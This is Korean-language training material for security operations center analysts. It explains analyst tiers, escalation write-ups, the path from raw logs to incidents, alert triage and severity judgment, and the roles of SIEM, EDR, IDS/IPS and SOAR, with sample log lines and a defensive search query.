💡 L1이 "이상한 로그인"을 에스컬레이션했고, L2가 "계정 탈취 + 내부 데이터 유출"로 재구성했습니다. 같은 Alert, 완전히 다른 깊이의 분석입니다.
L1 vs L2: 같은 Alert, 다른 관점
넓고 빠르게 vs 좁고 깊게
Part 2
구분L1 (Triage)L2 (Investigation)
핵심 질문"이것은 진짜인가, 오탐인가?""실제로 무슨 일이 일어났는가?"
시간 투자Alert당 2~10분Case당 30분~수 시간
관점단일 Alert 기준 분류관련 이벤트 전체를 타임라인으로 재구성
산출물분류 결과 (Benign/Escalate)조사 보고서, Incident 판정, 대응 권고
도구 활용SIEM Alert 큐, 기본 검색SIEM 심화 검색, EDR, 위협 인텔리전스
비유응급실 접수 간호사전문의 진단
보강 설명L1과 L2의 차이를 명확히 비교해 보겠습니다. L1은 넓고 빠르게, L2는 좁고 깊게 봅니다. 같은 Alert를 다르게 처리합니다.
L1L2비교
설명 확장
  • L1 관점에서 이 주제의 목적을 다시 설명하기
  • L2 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • L1·L2 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
L3: 미래의 탐지를 설계하는 역할
다음에는 더 빨리 잡히도록 탐지와 운영 구조를 개선한다
Part 2

L3의 핵심 업무

  • 탐지 룰/유스케이스 설계 및 튜닝
  • 오탐/미탐 분석
  • MITRE ATT&CK 기반 탐지 공백 식별
  • 위협 헌팅(Threat Hunting)
  • 파서/필드/데이터 품질 개선
Incident / Lessons Learned
Detection Gap Analysis
New Rule / Tuning / Hunt
Better Alerts
L3의 실제 업무 — "지난달 침해 후 무엇이 달라졌나"
🔴 L3 개입 전
  • DNS 터널링 공격 — 탐지 룰 없음
  • 공격자 30일간 은밀히 내부 체류
  • 수백 GB 데이터 외부 유출
  • 유출 완료 후 우연히 발견
🟢 L3 대응 이후
  • DNS 쿼리 패턴 분석 탐지 룰 신규 개발
  • Threat Hunt로 유사 패턴 전수 조사
  • MITRE T1071 기반 탐지 로직 구현
  • 동일 기법 재시도 → 2시간 내 탐지
💡 L3는 "지금 공격"을 막는 것이 아니라 "다음 공격을 미리 볼 수 있게" 탐지 눈을 업그레이드합니다. L1·L2가 현재를 지킨다면, L3는 미래를 설계합니다.
IR/CERT: 피해 확산을 멈추는 실행 조직
목표는 예쁘게 분석하는 것이 아니라, 위험을 통제하고 정상 상태로 복구하는 것
Part 2
🛑
Contain
계정 잠금
호스트 격리
IP 차단
🧹
Eradicate
악성 프로세스 제거
원인 제거
🔄
Recover
서비스 정상화
재발 방지
📋
Improve
사후 분석
개선 연결
NIST SP 800-61r3 관점: Incident Response는 사이버 리스크 관리의 일부이며, 탐지 → 대응 → 복구 → 개선의 연속 흐름으로 운영한다
랜섬웨어 발생 시 IR팀 실제 24시간 대응 예시
T+0hL1이 "파일 대량 암호화" Alert 수신 → L2 에스컬레이션 → IR팀 즉시 소집 T+1h억제: 감염 서버 네트워크 격리, 공유 폴더 접근 차단, 백업 서버 연결 분리 T+3h범위 파악: 전체 네트워크 스캔 → 감염 장비 17대 확인, 측면이동 경로 재구성 T+6h증거 보전: 포렌식 이미지 수집, 메모리 덤프, 이벤트 로그 보존 (법적 절차 대비) T+12h복구 시작: 백업에서 우선순위 시스템 복구, 비즈니스 영향도 낮은 순서로 재개 T+24h임시 운영 재개: 핵심 서비스 복구 완료. 전체 복구는 72시간 목표로 계속 진행.
⚠️ IR팀 없이 랜섬웨어를 맞으면: 평균 복구 기간 21일, 평균 피해액 $1.85M (Sophos 2024). IR팀이 있으면 이 수치가 절반 이하로 줄어듭니다.
좋은 SOC는 핸드오프가 끊기지 않는다
경고를 넘기는 것만으로 부족 — 판단 근거와 다음 행동이 함께 넘어가야 한다
Part 2

나쁜 에스컬레이션

"이상 로그인 같음. 확인 필요"
→ 다음 팀이 다시 처음부터 봐야 함

좋은 에스컬레이션

"해외 IP(SG), 신규 디바이스, MFA 성공 후 12분 내 85개 문서 다운로드 확인. 재택/VPN 예외 없음. 계정 잠금 및 사용자 확인 권고"
→ 다음 팀이 바로 행동 가능
  SOC의 문서화와 티켓 품질은 부수 업무가 아니라 핵심 운영 역량이다
보강 설명분석이 좋아도 핸드오프가 나쁘면 운영 품질은 떨어집니다. 예를 들어 이상 로그인 같음. 확인 필요 정도로 넘기면 다음 팀은 다시 처음부터 봐야 합니다. 반면 구체적인 사실과 권고를 함께 넘기면…
핸드오프티켓 품질근거
설명 확장
  • 핸드오프 관점에서 이 주제의 목적을 다시 설명하기
  • 티켓 품질 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 핸드오프·티켓 품질 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
에스컬레이션 템플릿
이 구조에 맞춰 작성하면 다음 팀이 바로 움직일 수 있다
Part 2
Alert ID
#SOC-2026-0319-0142
시간
2026-03-19 02:11 KST
관측 사실
domain_admin01 → DC01 로그인 (출발지: Helpdesk-PC-07)
이상 근거
비인가 시간대, PowerShell 실행, 신규 관리자 2개 생성, 승인 이력 없음
영향 범위
Domain Controller, 도메인 전체 계정에 영향 가능
Severity
CRITICAL
권고 조치
계정 즉시 통제, 호스트 격리, IR/CERT 호출, 로그 증적 보존
보강 설명좋은 에스컬레이션은 템플릿을 사용합니다. 이 구조에 맞춰 작성하면 다음 팀이 바로 움직일 수 있습니다.
에스컬레이션템플릿문서화
설명 확장
  • 에스컬레이션 관점에서 이 주제의 목적을 다시 설명하기
  • 템플릿 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 에스컬레이션·템플릿 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
NIST CSF 2.0 × SOC 역할 매핑
각 역할이 프레임워크의 어디에 해당하는지 보기
Part 2
NIST CSF 기능L1L2L3IR/CERT
Detect (탐지)●●●●●●●●
Respond (대응)●●●●●
Recover (복구)●●●
Identify (식별)●●
●●● = 핵심 역할 · ●● = 주요 참여 · ● = 부분 참여 · — = 직접 관여 낮음
보강 설명NIST CSF 2.0과 SOC 역할을 매핑해 보면, L1은 Detect의 최전선, L2는 Detect와 Respond의 교차점, IR은 Respond와 Recover를 담당합니다.
NIST CSF매핑역할
설명 확장
  • NIST CSF가 해결하려는 문제를 먼저 정리하기
  • 매핑 관련 기능과 경계 지점을 구분하기
  • 단독 기능보다 운영 흐름 안에서 바라보기
실무 포인트
  • 입력 데이터·출력 결과·담당 역할을 분리해서 보기
  • 탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
  • 정책·자동화가 없을 때 생기는 공백을 생각하기
예시 연결
  • 콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
  • 오탐/정탐 두 경우를 모두 떠올리기
  • NIST CSF 관련 사용 사례를 한 가지 말로 정리하기
Check Point: Part 2 복습
SOC 운영 구조에 대해 스스로 답해 보세요
Part 2 · 퀴즈

스스로 답해 보세요

Q1. L1과 L2의 가장 큰 차이는 무엇인가?
Q2. L3(Detection Engineering)가 강한 SOC의 특징은?
Q3. IR의 첫 번째 목표는 "예쁘게 분석하는 것"인가?
Q4. 좋은 에스컬레이션에 반드시 포함되어야 하는 것은?
Q5. "이상 로그인 같음. 확인 필요"가 나쁜 에스컬레이션인 이유는?
답변에 꼭 들어가면 좋은 핵심 키워드
L1 vs L2
넓고 빠른 분류 vs 좁고 깊은 조사 — 같은 Alert도 보는 깊이가 다르다
좋은 에스컬레이션
사실 + 이상 근거 + 영향 범위 + 권고 조치가 함께 있어야 다음 팀이 바로 움직일 수 있다
스스로 체크해볼 비교 질문
누가 무엇을 결정하는가?
L1은 처리 여부를 가르고, L2는 실제 무슨 일이 일어났는지와 영향 범위를 설명한다
핸드오프가 왜 중요한가?
다음 팀이 다시 처음부터 보지 않도록 판단 근거와 아직 모르는 점까지 같이 넘겨야 한다
보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.
퀴즈복습
답변 힌트
  • 핵심 정의를 한 문장으로 먼저 답하기
  • 예시는 1개만 붙여 간결하게 설명하기
  • 용어 차이는 목적과 역할로 구분해 말하기
생각 순서
  • 사실 → 맥락 → 판단 순서를 유지하기
  • 오탐 가능성과 추가 확인 항목을 함께 적기
  • 마지막은 다음 조치 제안으로 마무리하기
토론 포인트
  • 다른 역할이라면 같은 질문을 어떻게 볼지
  • 판단을 바꿀 추가 데이터가 무엇인지
  • 실무에서의 영향과 우선순위까지 연결하기
Part 2 요약 — SOC 운영 구조
Part 2 · 요약
✓ L1: 빠르고 일관된 분류 — SOC 품질의 관문
✓ L2: 가설 기반 타임라인 재구성 — 디지털 수사관
✓ L3: 미래의 탐지 설계 — Detection Engineering
✓ IR: 위험 통제 + 복구 — 실행 조직
✓ 핸드오프: 판단 근거 + 다음 행동이 함께 넘어가야 운영이 연결된다
역할은 나뉘어도 운영은 하나의 흐름으로 이어진다
L1
분류
L2
조사
L3
개선
IR
대응
핸드오프가 선명할수록 L2/IR는 다시 처음부터 조사하지 않고, L3는 다음 탐지를 더 빠르게 개선할 수 있다.
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
L1L2L3
핵심 회수
  • L1·L2 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
03
이벤트 흐름과 Alert 판단
Log → Event → Alert → Incident 구분과 Triage 방법
약 30분
Log Event Alert Incident Triage
모든 Alert가 Incident는 아니다
Raw data가 운영 판단 객체가 되기까지는 단계가 있다
Part 3
📄
Log
시스템이 남긴
원시 기록
📋
Event
의미를 해석한
단위 행위
🔔
Alert
탐지 로직이 주의를
요구한 상태
🚨
Incident
실제 대응이 필요한
보안 사건
"로그는 사실이고, Alert는 가설이며, Incident는 대응이 필요한 운영 결론이다."
Log ≒ 목격자 진술
"22:14에 정장 입은 남성이 1층 엘리베이터를 탔다" — 사실이지만 의미는 없다
Event ≒ 상황 파악
"엘리베이터가 금고실 층에서 멈췄고 신분 미확인 방문자다" — 의미를 붙였다
Alert ≒ 의심 신고
"출입 권한이 없는 층에서 탐지됨 — 확인 필요" — 경비실에 신호가 간다
Incident ≒ 대응 결정
"확인 결과 무단 침입 → 경비 출동 + 경찰 신고 + CCTV 확보" — 행동이 따른다
편의점 CCTV 비유로 보는 퍼널
📹
Log
CCTV 24시간 전원 기록
(입장객 전원)
1,000,000건/일
🎯
Event
규칙에 해당 행동 선별
(야간 방문자)
50,000건/일
🔔
Alert
CCTV가 경보 울림
(마스크 착용자)
500건/일
🚨
Incident
경비원이 실제 절도 확인
(분석가 판단)
3~5건/일
💡 Alert → Incident 전환은 사람 분석가의 판단이 들어가는 지점입니다. "이것이 진짜 위협인가"를 결정하는 것은 여전히 사람입니다.
하나의 로그인 이상 행위를 단계별로 보면
같은 흔적도 단계가 올라갈수록 데이터에서 의미로 압축된다
Part 3
Log
22:14:09 / user=finance01 / src_ip=203.x.x.x / country=SG / result=success
Event
"해외 국가에서의 성공 로그인"
Alert
"사용자 평소 접속국가와 다른 위치에서 로그인 성공" — 가설
Incident
"신규 디바이스 + MFA 직후 대량 다운로드 + 사용자 미확인 → 계정 탈취 의심" — 대응 결정
이 단계 전환에서 "사람의 판단"이 개입하는 지점
Log → Event: 시스템이 자동으로 정규화. "22:14 KR_IP 로그인 성공""finance01의 해외 국가 로그인 성공"으로 해석된다.
Alert → Incident: 사람(분석가)의 판단이 반드시 필요. "MFA 성공했지만 신규 디바이스 + 대량 다운로드"라는 맥락 해석은 시스템이 자동으로 할 수 없다.
로그를 읽는 기초: 핵심 필드 5가지
시간 · 사용자 · 행위 · 출발지 · 결과 — 이것만 먼저 파악
Part 3
[2026-03-19T22:14:09Z] user=finance01 action=login src_ip=203.0.113.42 result=success src_country=SG device=new_browser mfa=passed
🕐 When (시간)
22:14:09 — 야간 시간대
👤 Who (사용자)
finance01 — 재무 계정
🎯 What (행위)
login — 로그인 시도
📍 Where (출발지)
203.0.113.42 / Singapore — 해외 IP
✅ Result (결과)
success — 로그인 성공
입문자 팁: 로그를 처음 볼 때 이 순서로 읽자
1. 시간: 업무 시간인가? 야간·주말인가?
2. 누가: 관리자/VIP/일반 사용자?
3. 무엇을: 로그인? 파일 삭제? 대량 다운로드?
4. 어디서: 내부/해외/알려진 VPN?
5. 결과: 성공/실패/몇 번?
→ 5개만 파악해도 80%의 상황을 빠르게 요약할 수 있다.
숫자로 보는 Log → Incident 퍼널
대량의 원시 데이터에서 실제 Incident까지 걸러지는 과정
Part 3
1,000,000+
Raw Logs / day
50,000
Events (정규화된 행위)
500
Alerts (탐지 로직 트리거)
50
Investigated (L2 조사)
3~5
Incidents / day
* 숫자는 교육용 예시이며, 조직 규모와 환경에 따라 다릅니다
왜 1,000,000개의 로그에서 3~5개의 Incident만 나오는가?
로그 → 이벤트 (50,000)
대부분의 로그는 "정상 로그인", "파일 열기"처럼 의미가 없는 원시 기록. 이 중 "로그인 실패 반복", "야간 접속" 등 의미 있는 행위만 이벤트로 필터링.
이벤트 → Alert (500)
이벤트 중 탐지 룰에 걸리는 것만 Alert가 됨. 하지만 룰이 너무 넓으면 오탐이 많아지고, 너무 좁으면 실제 공격을 놓친다. 룰 품질이 핵심.
Alert → Incident (3~5)
대부분의 Alert는 오탐이거나 정상 행위. L1이 Triage를 거쳐 진짜 조사가 필요한 케이스만 추리면 하루 3~5건 수준. 이것이 SOC가 "가치 있는 판단"을 하는 이유.
오탐(False Positive)의 실제 비용
오탐이 많으면 진짜 위험을 놓친다 — Alert Fatigue
Part 3

Alert Fatigue란?

  • 너무 많은 알림에 지쳐 진짜 위험도 무시하게 되는 현상
  • 분석가가 기계적으로 "닫기"를 반복
  • 결과: 실제 Incident를 놓침
좋은 Alert는 많이 울리는 Alert가 아니라,
다음 행동을 이끌어내는 Alert이다
비유: 화재 경보기가 하루 100번 울리는 건물
처음엔 모두 뛰어나가지만, 1주일 후엔 경보 소리를 들어도 "또 오작동이겠지"하며 자리를 지킨다. 그러다 진짜 화재가 났을 때 아무도 반응하지 않는다. SOC의 Alert Fatigue가 바로 이 상황이다. 적은 Alert, 높은 신뢰도가 목표다.
70%+
보안 팀이 "Alert 과부하"를 경험
45%
Alert 중 무시되거나 미조사
오탐 비용 계산 — 연간으로 보면 얼마나 될까?
📊 일반적인 SOC 운영 현황
  • 일평균 Alert: 1,000 ~ 10,000건
  • 오탐 비율: 평균 45~65%
  • Alert 1건 분석 평균: 약 10분
  • L1 분석가 시급 환산: 3~5만원
💸 연간 오탐 처리 비용 계산
일 1,000건 × 50% 오탐 = 500건/일
500건 × 10분 = 5,000분/일
5,000분 ÷ 60 ≈ 83시간/일
83h × 4만원 = 332만원/일 낭비
연간: 약 12억원 (오탐만으로)
⚠️ 이래서 탐지 룰 튜닝이 중요합니다. 오탐을 10%만 줄여도 연간 1.2억 절감 + 분석가 번아웃 예방 + 진짜 위협 대응 시간 확보.
Alert Triage의 네 가지 질문
사실인가 → 정상인가 → 얼마나 위험한가 → 지금 조치가 필요한가
Part 3
1
데이터는 신뢰할 수 있는가?
오류/중복이면 → 닫기 또는 병합
닫기
2
알려진 정상 행위인가?
승인된 변경/정상 운영이면 → Benign / 예외처리
Benign
3
중요 자산/중요 계정과 관련 있는가?
민감 자산/고위험 징후면 → L2 에스컬레이션
Escalate
4
즉시 대응이 필요한 징후가 있는가?
확산/파괴 가능성이면 → IR 즉시 통보
IR 호출
Severity 판단축: 사용자 중요도 · 자산 중요도 · 행위 이상성 · 확산 가능성 · 증거 강도
4가지 질문을 실제 Alert에 적용하면
질문 1: 데이터 신뢰성
"로그인 실패 1,000회" Alert → 해당 서버가 어젯밤 점검 중이었다는 기록 확인 → 정상 작동 오류 → 닫기
질문 2: 정상 여부
"개발 서버에 새 포트 오픈" Alert → 변경 관리 시스템에 해당 날짜 배포 승인 기록 확인 → Benign, 예외처리
질문 3: 자산 중요도
"해외 IP 접속" Alert → 계정 확인 → domain_admin (최고 권한 계정) → 자산 중요도 최상 → 즉시 에스컬레이션
질문 4: 즉시 조치 필요성
"랜섬웨어 의심 파일" Alert → EDR에서 암호화 프로세스 진행 중 확인 → 초 단위 확산 가능 → 즉시 IR 호출 + 격리
좋은 분석 문장은 사실 + 해석 + 조치 제안으로 끝난다
"수상함"이라고 쓰는 것은 분석이 아니라 감상이다
Part 3

나쁜 예

"이상 로그인 같음"

좋은 예

"해외 신규 IP에서 재무계정 로그인 후 15분 내 대량 다운로드가 확인되어 계정 탈취 가능성이 높음. 사용자 확인 및 세션 차단 권고"
Fact
관측 사실
+
Reason
왜 의심되는가
+
Impact
영향 범위
+
Action
권고 조치
=
운영 가능한 판단문
왜 문서화된 판단문이 중요한가?
인수인계
야간 L1이 발견한 내용을 주간 L2가 이어받을 때, 구두가 아닌 문서로 남아야 정보 손실이 없다
감사·증거
사고 후 "언제 누가 무엇을 보고 어떤 판단을 했는가"가 법적·규제적 증거가 된다
개선 루프
잘 쓴 판단문이 쌓이면 "우리가 놓친 패턴"을 발견하고 탐지 룰을 개선하는 데이터가 된다
보강 설명SOC 분석이 어려운 이유 중 하나는, 머릿속으로는 이해했지만 문장으로 남기지 못하는 경우가 많기 때문입니다. 운영 조직에서는 구두 느낌보다 문서화된 판단이 중요합니다. 이 템플릿은 오늘…
FactWhy suspiciousImpact
설명 확장
  • Fact 관점에서 이 주제의 목적을 다시 설명하기
  • Why suspicious 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • Fact·Why suspicious 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
판단문 실전 예시
실제 분석가가 작성하는 판단문의 구조
Part 3
📋 Alert: 해외 IP 로그인 성공 — finance01
Fact:
22:14 Singapore IP에서 finance01 계정 로그인 성공. 신규 브라우저 세션. MFA 성공. 직후 12분 내 340개 문서 조회, 85개 다운로드.
Reason:
사용자는 현재 국내 근무 중이며 출장 등록 없음. 평소 접속 국가(KR)와 다름. 신규 디바이스. 야간 시간대. 대량 데이터 접근.
Impact:
재무 부서 계정으로 85개 문서가 다운로드됨. 문서의 기밀 등급 및 범위 확인 필요.
Action:
사용자 본인 확인 → 세션 즉시 종료 → 비밀번호 재설정 → 다운로드 문서 범위 조사 → L2/IR 에스컬레이션
Verdict: HIGH — 계정 탈취 또는 세션 악용 가능성 높음. 즉시 L2/IR 검토 필요.
이 판단문의 각 요소가 왜 중요한가
Fact:
관측 가능한 객관적 사실만 작성. "의심스럽다"는 표현 금지. "22:14 Singapore IP에서 로그인 성공"처럼 로그에 있는 그대로를 쓴다. 나중에 감사 증거로 사용된다.
Reason:
왜 이것이 의심되는지의 논리적 근거. "해외이므로 이상하다"가 아니라 "출장 등록 없음 + 신규 디바이스 + 평소 접속 국가 KR과 다름" 등 복수의 이상 신호를 나열한다.
Impact:
피해의 범위와 민감도. "85개 문서"가 일반 파일인지 기밀 계약서인지에 따라 Impact가 달라진다. 범위 파악이 안 됐다면 "범위 확인 필요"로 명시한다.
Action:
다음에 누가 무엇을 해야 하는지를 명확히. "확인 요청"이 아니라 "사용자 본인에게 연락 + 세션 즉시 종료 + 비밀번호 재설정 검토 + L2/IR 에스컬레이션"처럼 구체적이어야 한다.
Severity 판단 매트릭스
자산 중요도 × 행위 이상성으로 우선순위를 판단한다
Part 3
행위 이상성 낮음행위 이상성 중간행위 이상성 높음
자산 중요도 높음
(DC, VIP, 재무)
Medium High Critical
자산 중요도 중간
(업무 서버, 일반 관리자)
Low Medium High
자산 중요도 낮음
(일반 사용자 PC)
Info Low Medium
* 이 매트릭스는 교육용 단순화 모델이며, 실제 운영 시 조직별 기준에 맞춰 세분화해야 합니다
매트릭스 적용 예시 3가지
Low 예시: 일반 직원 PC에서 인터넷 브라우저로 알려진 악성 광고 URL 클릭 → 자산 중요도 낮음 + 행위 이상성 낮음(광고 클릭은 흔함) → Low. 사용자에게 주의 안내 후 Close.
High 예시: 재무 팀장 계정(자산 중요도 높음)으로 해외 IP 로그인 후 파일 다운로드(행위 이상성 중간) → High. 즉시 사용자 확인 + L2 에스컬레이션.
Critical 예시: Domain Controller(자산 중요도 최상)에 새벽 2시에 domain_admin 계정으로 PowerShell 실행 + 신규 관리자 계정 생성(행위 이상성 높음) → Critical. 즉시 IR 호출 + 격리 검토.
Check Point: Part 3 복습
이벤트 흐름과 Alert 판단에 대해 점검합니다
Part 3 · 퀴즈

스스로 답해 보세요

Q1. Log와 Event의 차이는 무엇인가?
Q2. Alert가 곧바로 Incident가 되지 않는 이유는?
Q3. Alert Triage에서 가장 먼저 확인해야 할 것은?
Q4. "수상함"이 나쁜 분석 문장인 이유는?
Q5. 좋은 판단문의 4가지 구성 요소는?
보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.
퀴즈복습
답변 힌트
  • 핵심 정의를 한 문장으로 먼저 답하기
  • 예시는 1개만 붙여 간결하게 설명하기
  • 용어 차이는 목적과 역할로 구분해 말하기
생각 순서
  • 사실 → 맥락 → 판단 순서를 유지하기
  • 오탐 가능성과 추가 확인 항목을 함께 적기
  • 마지막은 다음 조치 제안으로 마무리하기
토론 포인트
  • 다른 역할이라면 같은 질문을 어떻게 볼지
  • 판단을 바꿀 추가 데이터가 무엇인지
  • 실무에서의 영향과 우선순위까지 연결하기
Part 3 요약 — 이벤트 흐름과 Alert 판단
Part 3 · 요약
✓ Log: 시스템이 남긴 원시 기록 — 사실
✓ Event: 의미를 해석한 단위 행위 — 의미 부여
✓ Alert: 탐지 로직이 주의를 요구한 상태 — 가설
✓ Incident: 실제 대응이 필요한 보안 사건 — 운영 결론
✓ 판단문: Fact + Reason + Impact + Action = 운영 가능한 판단
입문자 3대 착각 — 지금 해소해 두자
착각 1: "Alert = 공격"
Alert는 "조사가 필요한 가설"이다. 대부분(~80%)은 오탐이거나 정상 행위다. 판단하기 전에 컨텍스트를 확인해야 한다.
착각 2: "MFA 성공 = 안전"
AiTM 피싱, MFA Fatigue, 세션 토큰 탈취로 MFA를 우회하는 공격이 증가하고 있다. MFA 성공은 "계정 소유자가 로그인했을 가능성"일 뿐이다.
착각 3: "로그인 성공 = 정상"
공격자가 탈취한 계정으로 로그인하면 시스템 입장에선 "정상 로그인"이다. 로그인 후 행위(파일 조회, 다운로드, 권한 변경 등)가 진짜 판단 기준이다.
04
보안 도구 이해
SIEM · EDR · IDS/IPS · SOAR의 역할과 연동
약 35분
SIEM EDR IDS/IPS SOAR 연동 구조
SOC가 쓰는 주요 보안 도구 맵
결국 "넓게 보는 도구", "깊게 보는 도구", "자동화하는 도구"로 정리할 수 있다
Part 4
도구핵심 역할비유시야 범위
SIEM로그 수집, 정규화, 상관분석, 탐지관제탑 레이더전체 인프라 (넓게)
EDR엔드포인트 행위 가시성, 격리/조치CCTV + 경비원호스트 내부 (깊게)
IDS/IPS네트워크 위협 탐지 및 차단교통 감시 카메라네트워크 흐름
SOAR플레이북 기반 자동화, 오케스트레이션자동화 로봇 팔도구 간 연결
Case/Ticket협업과 추적 관리수사 기록 장부운영 문서화
보강 설명초심자에게는 보안 도구가 서로 비슷해 보이지만, 실제 역할은 상당히 다릅니다. SIEM은 넓게 보고, EDR은 깊게 보고, IDS/IPS는 네트워크를 감시하고, SOAR는 여러 도구를 묶어…
SIEMEDRIDS/IPS
설명 확장
  • SIEM가 해결하려는 문제를 먼저 정리하기
  • EDR 관련 기능과 경계 지점을 구분하기
  • 단독 기능보다 운영 흐름 안에서 바라보기
실무 포인트
  • 입력 데이터·출력 결과·담당 역할을 분리해서 보기
  • 탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
  • 정책·자동화가 없을 때 생기는 공백을 생각하기
예시 연결
  • 콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
  • 오탐/정탐 두 경우를 모두 떠올리기
  • SIEM 관련 사용 사례를 한 가지 말로 정리하기
SIEM: SOC의 중심 관제 플랫폼
로그 보관함이 아니라, 다양한 흔적을 모아 상관분석하고 탐지를 만드는 플랫폼
Part 4

SIEM이 하는 일

  • 다양한 로그 수집 및 중앙화
  • 필드 정규화 및 파싱
  • 검색(Search)과 상관분석(Correlation)
  • 탐지 룰 기반 Alert 생성
  • 대시보드 / 리포트 / Case 연계

SIEM이 잘 답하는 질문

같은 행위가 다른 자산에도 있었는가?
이 계정은 최근 어떤 시스템에 접근했는가?
이 IOC와 연관된 로그가 더 있는가?
⚠ 로그 품질이 나쁘면 탐지도 나쁘다
⚠ 컨텍스트 없는 Alert는 소음이 된다
SIEM 검색 쿼리 개념 예시
user="finance01" AND country!="KR" AND action="login_success"
→ 재무계정이 한국 이외 국가에서 로그인 성공한 모든 기록을 가져온다
이런 검색 패턴을 "탐지 룰"로 저장하면 자동으로 Alert가 생성된다
보강 설명SIEM은 SOC에서 가장 자주 보게 되는 핵심 플랫폼입니다. 중요한 점은 SIEM이 마법 상자가 아니라는 것입니다. 로그 품질이 나쁘면 탐지도 나쁘고, 컨텍스트가 없으면 Alert는 많아도…
중앙화정규화상관분석
설명 확장
  • 중앙화가 해결하려는 문제를 먼저 정리하기
  • 정규화 관련 기능과 경계 지점을 구분하기
  • 단독 기능보다 운영 흐름 안에서 바라보기
실무 포인트
  • 입력 데이터·출력 결과·담당 역할을 분리해서 보기
  • 탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
  • 정책·자동화가 없을 때 생기는 공백을 생각하기
예시 연결
  • 콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
  • 오탐/정탐 두 경우를 모두 떠올리기
  • 중앙화 관련 사용 사례를 한 가지 말로 정리하기
EDR은 호스트를 깊게, IDS/IPS는 네트워크를 본다
서로 대체재가 아니라 서로 다른 관찰 지점을 갖는 센서
Part 4

EDR

  • 프로세스 트리, 명령행
  • 파일 생성/삭제
  • 레지스트리, 서비스 변경
  • 호스트 격리·파일 차단 가능
호스트 내부 · 깊은 분석

IDS

  • 네트워크 패턴 기반 탐지
  • 악성 트래픽, 시그니처
  • 비정상 통신 탐지
  • 탐지 중심 (차단 X)
네트워크 · 탐지 전용

IPS

  • 탐지 + 정책 기반 차단
  • Inline 장비 특성
  • 오탐 시 정상 트래픽 차단 위험
  • 오탐 관리가 핵심
네트워크 · 탐지+차단
어떤 상황에서 어떤 도구를 주로 보나?
EDR: 악성코드 감염 의심 — 어떤 프로세스가 실행됐고 어떤 파일을 만들었는가 → 해당 호스트를 즉시 네트워크 격리하는 것도 EDR로 가능
IDS: 내부 서버에서 외부로 비정상 대량 트래픽 → IDS Alert 확인 후 분석가가 SIEM에서 출처 계정/프로세스를 연결해 조사
IPS: 알려진 Exploit 패킷이 차단됐다는 로그 → "이미 차단됐으니 끝"이 아니라 "왜 이 공격이 왔는가, 다른 경로는 없는가"를 SIEM으로 연계 분석
SOAR: 자동화와 오케스트레이션의 엔진
사람을 없애는 도구가 아니라, 반복 작업을 빠르고 일관되게 실행하게 만드는 도구
Part 4

SOAR 핵심

  • 여러 보안 도구와 시스템을 연결
  • 반복 업무를 플레이북으로 자동화
  • 자동 보강(Enrichment), 티켓 생성, 조치 수행
  • 승인 기반(Human-in-the-loop) 워크플로
⚠ "나쁜 프로세스를 자동화하면 더 빨리 망가진다"
⚠ "SOAR 도입 = 사람 필요 없음"은 오해
🔔 Alert 발생
📊 Enrichment (자동 보강)
⬇ 조건 분기
낮은 위험
→ 티켓 생성
중간 위험
→ 승인 요청
높은 위험
→ 자동 격리
보강 설명SOAR를 도입한다고 해서 사람이 필요 없어지는 것은 아닙니다. 오히려 잘 정리된 프로세스와 판단 기준이 있어야 자동화가 안전하게 동작합니다. 현업에서는 나쁜 프로세스를 자동화하면 더 빨리…
PlaybookOrchestrationAutomation
설명 확장
  • Playbook가 해결하려는 문제를 먼저 정리하기
  • Orchestration 관련 기능과 경계 지점을 구분하기
  • 단독 기능보다 운영 흐름 안에서 바라보기
실무 포인트
  • 입력 데이터·출력 결과·담당 역할을 분리해서 보기
  • 탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
  • 정책·자동화가 없을 때 생기는 공백을 생각하기
예시 연결
  • 콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
